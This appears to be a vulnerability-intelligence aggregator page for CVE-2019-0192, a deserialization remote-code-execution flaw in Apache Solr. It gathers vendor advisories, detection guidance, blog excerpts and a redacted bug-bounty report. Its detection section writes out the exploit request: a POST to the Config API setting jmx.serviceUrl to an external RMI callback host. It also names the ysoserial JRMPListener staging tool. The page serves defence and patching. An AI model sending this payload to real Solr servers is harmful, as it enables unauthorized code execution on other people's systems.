CVE-2019-0192
published 2019-03-07CVE-2019-0192: In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a…
PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
77.51%
99.5th percentile
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | solr | 5.0.0 – 5.5.5 | — |
| apache | solr | 6.0.0 – 6.6.5 | — |
| apache_software_foundation | apache_solr | — | — |
| debian | lucene-solr | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /solr/admin/cores?wt=json HTTP/1.1
urlPOST /solr/{{core_name}}/config HTTP/1.1
command{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}
path/solr/admin/cores
path/solr/{{core_name}}/config
- →Detect exploit attempts by monitoring for HTTP POST requests to /solr/<core>/config containing the 'set-property' JSON key with 'jmx.serviceUrl' pointing to an external RMI host.
- →Detect outbound RMI connections from the Solr server to unexpected external hosts, which indicates the JMX serviceUrl was successfully set to a malicious RMI listener. ↗
- →Match on Nuclei template matchers: HTTP 500 status, response body containing 'javax.management.remote.rmi', and Content-Type 'text/plain' in combination with a POST to /solr/<core>/config.
- →Trend Micro Deep Security / Vulnerability Protection DPI rule 1009601 covers this CVE. ↗
- →Trend Micro TippingPoint MainlineDV filter 313798 covers this CVE. ↗
- →The ysoserial tool with the JRMPListener payload class is used to stage the malicious RMI server in exploitation of this CVE. ↗
- ·Affected versions are Apache Solr 5.0.0–5.5.5 and 6.0.0–6.6.5 only; versions 7.0 and later are not vulnerable. ↗
- ·The Nuclei template requires two sequential HTTP requests: first a GET to /solr/admin/cores to extract a valid core name, then the POST exploit to /solr/<core>/config.
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_debian9.8LOW
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Oracle
Oracle Oracle Big Data Graph Risk Matrix: Property Graph Analytics (Apache Solr) — CVE-2019-0192
vendor_oracle·2020-10-15·CVSS 9.8
CVE-2019-0192 [CRITICAL] Oracle Oracle Big Data Graph Risk Matrix: Property Graph Analytics (Apache Solr) — CVE-2019-0192
Oracle Oracle Big Data Graph Risk Matrix: Property Graph Analytics (Apache Solr) vulnerability
CVE: CVE-2019-0192
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2020 (OCT 2020)
Red Hat
solr: remote code execution due to unsafe deserialization
vendor_redhat·2019-03-07·CVSS 9.8
CVE-2019-0192 [CRITICAL] CWE-20 solr: remote code execution due to unsafe deserialization
solr: remote code execution due to unsafe deserialization
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
A flaw was found in the Apache Solr's Config API, where it would permit the configuration of the JMX server via an HTTP POST request. An attacker could use this flaw to direct traffic to a malicious RMI server, and then trigger remote code execution or conduct further attacks.
Mitigation: * Upgrade to 6.6.6 or later
* Disable the ConifgAPI if not in use (`disable.configEdit=true`)
* Use other external means to ensure only trusted traffic is
Debian
CVE-2019-0192: lucene-solr - In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows...
vendor_debian·2019·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: lucene-solr - In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows...
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
OSV
Critical severity vulnerability that affects org.apache.solr:solr-core
osv·2019-03-14
CVE-2019-0192 [CRITICAL] Critical severity vulnerability that affects org.apache.solr:solr-core
Critical severity vulnerability that affects org.apache.solr:solr-core
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
GHSA
Critical severity vulnerability that affects org.apache.solr:solr-core
ghsa·2019-03-14
CVE-2019-0192 [CRITICAL] CWE-502 Critical severity vulnerability that affects org.apache.solr:solr-core
Critical severity vulnerability that affects org.apache.solr:solr-core
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
OSV
CVE-2019-0192: In Apache Solr versions 5
osv·2019-03-07·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: In Apache Solr versions 5
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
VulnCheck
Apache Solr Deserialization of Untrusted Data
vulncheck·2019·CVSS 9.8
CVE-2019-0192 [CRITICAL] Apache Solr Deserialization of Untrusted Data
Apache Solr Deserialization of Untrusted Data
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
Affected: Apache Solr
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
Exploit PoC: https://vulncheck.com/xdb/54759569be2d; https://vulncheck.com/xdb/8be89dc68d9f
No detection rules found.
Nuclei
Apache Solr - Deserialization of Untrusted Data
nuclei·CVSS 9.8
CVE-2019-0192 [CRITICAL] Apache Solr - Deserialization of Untrusted Data
Apache Solr - Deserialization of Untrusted Data
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
Template:
id: CVE-2019-0192
info:
name: Apache Solr - Deserialization of Untrusted Data
author: hnd3884
severity: critical
description: |
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
impact: |
Unauthentica
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Tenable
WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
blogs_tenable·2019-07-25·CVSS 9.8
[CRITICAL] WatchBog Malware Adds BlueKeep Scanner (CVE-2019-0708), New Exploits (CVE-2019-10149, CVE-2019-11581)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Exploits & Vulnerabilities
# CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya
Mar 27, 2019
Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Succ
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Exploits y vulnerabilidades
## CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya Mar 27, 2019 Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192 . It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Su
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Sfruttamento vulnerabilità
## CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya Mar 27, 2019 Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192 . It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Suc
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Exploits & Vulnerabilities
## CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya Mar 27, 2019 Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192 . It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Suc
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Exploits & Vulnerabilities
# CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya
2019/03/27
Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Succes
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Exploits & Vulnerabilities
## CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya 2019/03/27 Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192 . It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
Succe
Trendmicro
CVE-2019-0192: Unsecure Deserialization in Apache Solr
blogs_trendmicro·2019-03-27·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192: Unsecure Deserialization in Apache Solr
Ausnutzung von Schwachstellen
## CVE-2019-0192: Unsecure Deserialization in Apache Solr
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192. It’s a critical vulnerability related to deserialization of untrusted data.
By: Santosh Subramanya Mar 27, 2019 Read time: ( words)
Save to Folio
Security researcher Michael Stepankin reported a vulnerability found in the popular, open-source enterprise search platform Apache Solr: CVE-2019-0192 . It’s a critical vulnerability related to deserialization of untrusted data. To have a better understanding of how the vulnerability works, we replicated how it could be exploited in a potential attack by using a publicly available proof of concept (PoC).
HackerOne
Remote Code Execution on █████████
hackerone·2020-09-03·CVSS 9.8
CVE-2019-0192 [CRITICAL] Remote Code Execution on █████████
Remote Code Execution on █████████
**Summary:**
An unauth solr lead to RCE on ██████████
**Description:**
Hello, I found a solr unauth at https://██████/solr/
This version is 5.5.1, vulnerable with CVE-2019-0192 and CVE-2019-0193, i have try CVE-2019-0193 and successful RCE.
## Impact
Attacker can get shell on server.
## Step-by-step Reproduction Instructions
1. First go to Core Admin and copy path.
██████
2. Update the config.
███████
3. Execute code.
██████████
## Product, Version, and Configuration (If applicable)
Apache Sole 5.5.1
## Suggested Mitigation/Remediation Actions
Update to the latest version and set auth.
## Impact
Attacker can get shell on server.
Bugzilla
CVE-2019-0192 solr3: solr: remote code execution due to unsafe deserialization [fedora-all]
bugzilla·2019-03-25·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192 solr3: solr: remote code execution due to unsafe deserialization [fedora-all]
CVE-2019-0192 solr3: solr: remote code execution due to unsafe deserialization [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supp
Bugzilla
CVE-2019-0192 solr: remote code execution due to unsafe deserialization
bugzilla·2019-03-25·CVSS 9.8
CVE-2019-0192 [CRITICAL] CVE-2019-0192 solr: remote code execution due to unsafe deserialization
CVE-2019-0192 solr: remote code execution due to unsafe deserialization
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
Reference:
http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E
Discussion:
Created solr3 tracking bugs for this issue:
Affects: fedora-all [bug 1692346]
---
Mitigation:
* Upgrade to 6.6.6 or later
* Disable the ConifgAPI if not in use (`disable.configEdit=true`)
* Use other external means to ensure only trusted traffic is allowed
http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3Ehttp://www.securityfocus.com/bid/107318https://access.redhat.com/errata/RHSA-2019:2413https://lists.apache.org/thread.html/42c5682f4acd1d03bd963e4f47ae448d7cff66c16b19142773818892%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/53e4744b14fb7f1810405f8ff5531ab0953a23dd09ce8071ce87e00d%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/b0ace855f569c6b7a0b03ba68566e53b1a1a519abd536bf38978ce4a%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/d0e608c681dfbb16b4da68d99d43fa0ddbd366bb3bcf5bc0d43c56d7%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/ec9c572fb803b26ba0318777977ee6d6a2fb3a2c50d9b4224e541d5d%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3Ehttps://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3Ehttps://security.netapp.com/advisory/ntap-20190327-0003/https://www.oracle.com/security-alerts/cpuoct2020.htmlhttps://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.htmlhttp://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3Ehttp://www.securityfocus.com/bid/107318https://access.redhat.com/errata/RHSA-2019:2413https://lists.apache.org/thread.html/42c5682f4acd1d03bd963e4f47ae448d7cff66c16b19142773818892%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/53e4744b14fb7f1810405f8ff5531ab0953a23dd09ce8071ce87e00d%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/b0ace855f569c6b7a0b03ba68566e53b1a1a519abd536bf38978ce4a%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/d0e608c681dfbb16b4da68d99d43fa0ddbd366bb3bcf5bc0d43c56d7%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/ec9c572fb803b26ba0318777977ee6d6a2fb3a2c50d9b4224e541d5d%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3Ehttps://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3Ehttps://security.netapp.com/advisory/ntap-20190327-0003/https://www.oracle.com/security-alerts/cpuoct2020.htmlhttps://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
2019-03-07
Published
Exploited in the wild